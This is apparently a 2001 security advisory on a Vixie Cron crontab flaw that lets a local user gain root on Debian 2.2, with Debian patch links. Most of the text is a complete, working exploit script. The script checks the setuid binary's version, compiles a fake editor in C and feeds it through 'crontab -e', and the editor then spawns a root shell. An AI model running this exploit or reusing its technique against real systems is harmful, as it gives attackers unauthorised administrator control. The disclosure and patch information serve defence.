
Privilege escalation in some versions of Vixie Cron crontab


Published: 2001-05-09
Updated: 2001-05-09
Severity:
Threat level: local administrator privileges
Error type: design error
Exploitation mode: server mode

Affected systems
Paul Vixie Vixie Cron 3.0pl1
   + Debian Linux 2.2 sparc
   + Debian Linux 2.2 powerpc
   + Debian Linux 2.2 arm
   + Debian Linux 2.2 alpha
   + Debian Linux 2.2 68k
   + Debian Linux 2.2
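Detailed description
Vixie cron is a popular program for running commands on a schedule. When a parse error occurs after an edit, crontab goes on to the subsequent edit without dropping its root privileges. An attacker can therefore edit their own crontab file and enter a line that makes parsing fail, and can then execute arbitrary commands from the editor or overwrite arbitrary files.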

Test code
#!/bin/bash

clear
echo ".-----------------------------------------------------------."
echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |"
echo "|===========================================================|"
echo "| Sebastian Krahmer <krahmer@security.is>                   |"
echo "| Michal Zalewski <lcamtuf@coredump.cx>                     |"
echo "\`-----------------------------------------------------------'"
echo

test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab

echo    ">>> Using binary:  $CRONBIN"
echo -n ">>> Setuid check:  "

if [ -u $CRONBIN ]; then
  echo "PASSED"
else
  echo "FAILED"
  echo
  exit 1
fi

echo -n ">>> Version check: "

QQ=`strings $CRONBIN | grep '43 vixie Exp'`

if [ "$QQ" = "" ]; then
  echo "FAILED"
  echo
  exit 1
else
  echo "PASSED"
fi

echo ">>> Building exploit..."

cat >edit0r.c <<_eof_
#include <stdio.h>
int main(int argc,char* argv[]) {
  sleep(1);
  if (geteuid()) {
    FILE* x=fopen(argv[1],"w");
    fprintf(x,"blah blah blah\n");
    fclose(x);
  } else {
    dup2(1,0);
    dup2(1,2);
    printf("\n>>> Entering rootshell, babe...\n");
    system("touch $HOME/.xploited");
    system("bash");
  }
}
_eof_

gcc edit0r.c -o edit0r &>/dev/null
rm -f edit0r.c

if [ ! -f edit0r ]; then
  echo ">>> Cannot compile exploit."
  echo
  exit 1
fi

rm -f ~/.xploited

echo ">>> Performing attack..."

( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null

rm -f edit0r

if [ -f ~/.xploited ]; then
  echo
  echo ">>> Thank you."
  rm -f ~/.xploited
  echo
  exit 0
else
  echo
  echo ">>> Apparently I am not able to exploit it, sorry..."
  echo
  exit 1
fi

Solution
Upgrade:
Paul Vixie Vixie Cron 3.0pl1:

    Debian upgrade 2.2 alpha cron_3.0pl1-57.3_alpha.deb
    http://security.debian.org/dists/stable/updates/main/binary-alpha/cron_3.0pl1-57.3_alpha.deb

    Debian upgrade 2.2 arm cron_3.0pl1-57.3_arm.deb
    http://security.debian.org/dists/stable/updates/main/binary-arm/cron_3.0pl1-57.3_arm.deb

    Debian upgrade 2.2 i386 cron_3.0pl1-57.3_i386.deb
    http://security.debian.org/dists/stable/updates/main/binary-i386/cron_3.0pl1-57.3_i386.deb

    Debian upgrade 2.2 m68k cron_3.0pl1-57.3_m68k.deb
    http://security.debian.org/dists/stable/updates/main/binary-m68k/cron_3.0pl1-57.3_m68k.deb

    Debian upgrade 2.2 ppc cron_3.0pl1-57.3_powerpc.deb
    http://security.debian.org/dists/stable/updates/main/binary-powerpc/cron_3.0pl1-57.3_powerpc.deb

    Debian upgrade 2.2 sparc cron_3.0pl1-57.3_sparc.deb
    http://security.debian.org/dists/stable/updates/main/binary-sparc/cron_3.0pl1-57.3_sparc.deb

Related information